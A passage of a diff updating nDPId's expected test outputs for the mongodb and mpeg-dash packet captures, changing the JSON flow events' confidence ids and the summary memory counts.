+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 
00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":27,"packets-processed":27,"total-skipped-flows":0,"total-l4-payload-len":706,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":37,"global_ts_msec":1483814916108} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 27/27 @@ -43,9 +43,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5876598 bytes -~~ total memory freed........: 5876598 bytes -~~ total allocations/frees...: 118161/118161 +~~ total memory allocated....: 6010232 bytes +~~ total memory freed........: 6010232 bytes +~~ total allocations/frees...: 120923/120923 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 817 chars diff --git a/test/results/mpeg-dash.pcap.out b/test/results/mpeg-dash.pcap.out index 10c78fd9d..98b98b899 100644 --- a/test/results/mpeg-dash.pcap.out +++ b/test/results/mpeg-dash.pcap.out 
@@ -4,25 +4,25 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1618744212035,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1618744212035,"pkt":"AAAAAAAAAAQAk2VwCABFAAA8XJFAAEAGk4MKVAFRpviYCu3+AFDXU1UdAAAAAKAC\/\/+5fwAAAgQFtAQCCArQulhbAAAAAAEDAwo="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1618744212169,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744212169,"pkt":"AAAAAAAAAAMAbDnzCABFAAA0AABAADAGAB2m+JgKClQBUQBQ7f6v9cxW11NVHoASchAbdQAAAgQFeAEBBAIBAwMK"} 00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1618744212202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":382,"pkt_l4_len":348,"thread_ts_msec":1618744212202,"pkt":"AAAAAAAAAAQAk2VwCABFAAFwXJNAAEAGkk0KVAFRpviYCu3+AFDXU1Uer\/XMV1AYAFYA8wAAR0VUIC9hcy9iaWdvLWFkLWNyZWF0aXZlcy8zczMvMmxPVEE3Lm1wNCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBTTS1BNzE1RiBCdWlsZC9SUDFBLjIwMDcyMC4wMTI7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODkuMC40Mzg5LjEwNSBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KYmlnby1oYXNoOiBWRkJOek8zaVZjdkdwV05kDQpIb3N0OiBnZGwubmV3cy1jZG4uc2l0ZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} 
-01094{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1618744212035,"flow_last_seen":1618744212202,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":328,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1618744212202,"l3_proto":"ip4","src_ip":"10.84.1.81","dst_ip":"166.248.152.10","src_port":60926,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP.MpegDash","breed":"Acceptable","category":"Media"},"http": {"hostname":"gdl.news-cdn.site","url":"gdl.news-cdn.site\/as\/bigo-ad-creatives\/3s3\/2lOTA7.mp4","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; SM-A715F Build\/RP1A.200720.012; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/89.0.4389.105 Mobile Safari\/537.36"}} +01094{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1618744212035,"flow_last_seen":1618744212202,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":328,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1618744212202,"l3_proto":"ip4","src_ip":"10.84.1.81","dst_ip":"166.248.152.10","src_port":60926,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"HTTP.MpegDash","breed":"Acceptable","category":"Media"},"http": 
{"hostname":"gdl.news-cdn.site","url":"gdl.news-cdn.site\/as\/bigo-ad-creatives\/3s3\/2lOTA7.mp4","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; SM-A715F Build\/RP1A.200720.012; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/89.0.4389.105 Mobile Safari\/537.36"}} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":5,"source":"mpeg-dash.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":1728,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1652784807797} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1652784807797,"flow_last_seen":1652784807797,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1652784807797,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59142,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1652784807797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1652784807797,"pkt":"tKXvZygQwDiWIaSpCABFAAA8gI1AAEAGWyfAqAJpNqFlVecGAFDeWzbUAAAAAKAC+vAGuAAAAgQFtAQCCArGziP6AAAAAAEDAwc="} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1652784807901,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1652784807901,"pkt":"wDiWIaSptKXvZygQCABFAAA8AABAAOwGL7Q2oWVVwKgCaQBQ5waq30sm3ls21aASaN+YUwAAAgQFrAQCCAqvHVtJxs4j+gEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1652784807901,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1652784807901,"pkt":"tKXvZygQwDiWIaSpCABFAAA0gI5AAEAGWy7AqAJpNqFlVecGAFDeWzbVqt9LJ4AQAfYtmQAAAQEICsbOJGKvHVtJ"} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1652784807797,"flow_last_seen":1652784807901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1652784807901,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59142,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1652784807797,"flow_last_seen":1652784807901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1652784807901,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59142,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1652784808500,"flow_last_seen":1652784808500,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1652784808500,"l3_proto":"ip4","src_ip":"54.161.101.85","dst_ip":"192.168.2.105","src_port":80,"dst_port":59144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
02400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1652784808500,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1652784808500,"pkt":"wDiWIaSptKXvZygQCABFAAXUcu5AAOwGty02oWVVwKgCaQBQ5wi4j+HSMIk\/coAQANuo3AAAAQEICq8dXZ\/GziZPSFRUUC8xLjEgMjAwIE9LDQpEYXRlOiBUdWUsIDE3IE1heSAyMDIyIDEwOjUzOjI4IEdNVA0KU2VydmVyOiBBcGFjaGUvMi40LjUzICgpIE9wZW5TU0wvMS4wLjJrLWZpcHMgbW9kX3dzZ2kvNC43LjEgUHl0aG9uLzMuNw0KVXBncmFkZTogaDIsaDJjDQpDb25uZWN0aW9uOiBVcGdyYWRlDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkV4cGlyZXM6IC0xDQpEQVNILUxpdmUtU2ltdWxhdG9yOiBEQVNILUlGIGxpdmUgREFTSCBzaW11bGF0b3IgMi4wLjENCkFjY2Vzcy1Db250cm9sLUFsbG93LUhlYWRlcnM6IG9yaWdpbixyYW5nZSxhY2NlcHQtZW5jb2RpbmcscmVmZXJlcg0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctTWV0aG9kczogR0VULEhFQUQsT1BUSU9OUw0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luOiAqDQpBY2Nlc3MtQ29udHJvbC1FeHBvc2UtSGVhZGVyczogU2VydmVyLHJhbmdlLENvbnRlbnQtTGVuZ3RoLENvbnRlbnQtUmFuZ2UsRGF0ZQ0KQ29udGVudC1MZW5ndGg6IDk0NA0KQ29udGVudC1UeXBlOiB2aWRlby9tcDQNCg0KAAAAHGZ0eXBpc281AAAAAWF2YzFpc281ZGFzaAAAAAhmcmVlAAAAYGZyZWVJc29NZWRpYSBGaWxlIFByb2R1Y2VkIHdpdGggR1BBQyAwLjUuMi1ERVYtcmV2VmVyc2lvbjogMC41LjItNDI2LWdjNWFkNGU0K2Rmc2c1LTFidWlsZDEAAAADLG1vb3YAAABsbXZoZAAAAAAAAAAAAAAAAAAAA+gAAAAAAAEAAAEAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAABIbXZleAAAABBtZWhkAAAAAAA27oAAAAAgdHJleAAAAAAAAAABAAAAAQAAAgAAAAAAAAEAAAAAABB0cmVwAAAAAAAAAAEAAAIOdHJhawAAAFx0a2hkAAAAAwAAAADVk9GpAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAQAAAAAUAAAAC0AAAAAAAJGVkdHMAAAAcZWxzdAAAAAAAAAABAAAAAAAABAAAAQAAAAABhm1kaWEAAAAgbWRoZAAAAAAAAAAAAAAAAAAAPAAAAAAAFccAAAAAAC1oZGxyAAAAAAAAAAB2aWRlAAAAAAAAAAAAAAAAVmlkZW9IYW5kbGVyAAAAATFtaW5mAAAAFHZtaGQAAAABAAAAAAAAAAAA
AAAkZGluZgAAABxkcmVmAAAAAAAAAAEAAAAMdXJsIAAAAAEAAADxc3RibAAAAKVzdHNkAAAAAAAAAAEAAACVYXZjMQAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAUAAtAASAAAAEgAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABj\/\/wAAAD9hdmNDAWQAH\/\/hACNnZAAfrNlAUAW6EAAAAwAQAAADA8ZKAAknwAEk\/mkwB4wYywEABWjr7LIs\/Pj4AAAAABBzdHRzAAAAAAAAAAAAAAAQc3RzYwAAAAAAAAAAAAAAFHN0c3oAAAAAAAAAAAAAAAAAAAAQc3RjbwAAAAAAAAAAAAAAYnVkdGEAAABabWV0YQAAAAAA"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1652784808500,"flow_last_seen":1652784808500,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1652784808500,"l3_proto":"ip4","src_ip":"54.161.101.85","dst_ip":"192.168.2.105","src_port":80,"dst_port":59144,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Media"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1652784808500,"flow_last_seen":1652784808500,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1652784808500,"l3_proto":"ip4","src_ip":"54.161.101.85","dst_ip":"192.168.2.105","src_port":80,"dst_port":59144,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Media"}} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1652784808500,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1652784808500,"pkt":"tKXvZygQwDiWIaSpCABFAAA0NqpAAEAGpRLAqAJpNqFlVecIAFAwiT9yuI\/ncoAQAfUkJQAAAQEICsbOJrmvHV2f"} 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1652784808501,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1652784808501,"pkt":"wDiWIaSptKXvZygQCABFAACBcu9AAOwGvH82oWVVwKgCaQBQ5wi4j+dyMIk\/coAYANvyTQAAAQEICq8dXZ\/GziZPAAAhaGRscgAAAAAAAAAAbWRpcmFwcGwAAAAAAAAAAAAAAAAtaWxzdAAAACWpdG9vAAAAHWRhdGEAAAABAAAAAExhdmY1Ni40MC4xMDE="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1652784814543,"flow_last_seen":1652784814543,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59146,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1652784814543,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":257,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":257,"pkt_l4_len":223,"thread_ts_msec":1652784814543,"pkt":"tKXvZygQwDiWIaSpCABFAADzRtZAAEAGlCfAqAJpNqFlVecKAFBASLN\/hVfSJoAYAfZzRwAAAQEICsbOPlSvHXU7R0VUIC9saXZlc2ltL3N0c18xNjUyNzgzODA5L3NpZF80MGMxMWUxMi9jaHVua2R1cl8xL2F0b183L3Rlc3RwaWM0XzhzL1YyNDAwLzIwNjU5ODA5OS5tNHMgSFRUUC8xLjENCkhvc3Q6IGxpdmVzaW0uZGFzaGlmLm9yZw0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNClVzZXItQWdlbnQ6IFZMQy8zLjAuMTYgTGliVkxDLzMuMC4xNg0KDQo="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1652784814543,"flow_last_seen":1652784814543,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59146,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1652784807797,"flow_last_seen":1652784807901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59142,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1652784808500,"flow_last_seen":1652784808514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1708,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"54.161.101.85","dst_ip":"192.168.2.105","src_port":80,"dst_port":59144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Media"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1652784814543,"flow_last_seen":1652784814543,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59146,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
-00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1618744212035,"flow_last_seen":1618744212338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1728,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"10.84.1.81","dst_ip":"166.248.152.10","src_port":60926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP.MpegDash","breed":"Acceptable","category":"Media"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1652784814543,"flow_last_seen":1652784814543,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59146,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1652784807797,"flow_last_seen":1652784807901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59142,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1652784808500,"flow_last_seen":1652784808514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1708,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"54.161.101.85","dst_ip":"192.168.2.105","src_port":80,"dst_port":59144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Media"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1652784814543,"flow_last_seen":1652784814543,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"192.168.2.105","dst_ip":"54.161.101.85","src_port":59146,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1618744212035,"flow_last_seen":1618744212338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1728,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1652784814543,"l3_proto":"ip4","src_ip":"10.84.1.81","dst_ip":"166.248.152.10","src_port":60926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"HTTP.MpegDash","breed":"Acceptable","category":"Media"}} 
00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":13,"source":"mpeg-dash.pcap","alias":"nDPId-test","packets-captured":13,"packets-processed":13,"total-skipped-flows":0,"total-l4-payload-len":3811,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":26,"global_ts_msec":1652784814543} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 13/13 @@ -32,9 +32,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5873505 bytes -~~ total memory freed........: 5873505 bytes -~~ total allocations/frees...: 118148/118148 +~~ total memory allocated....: 6007139 bytes +~~ total 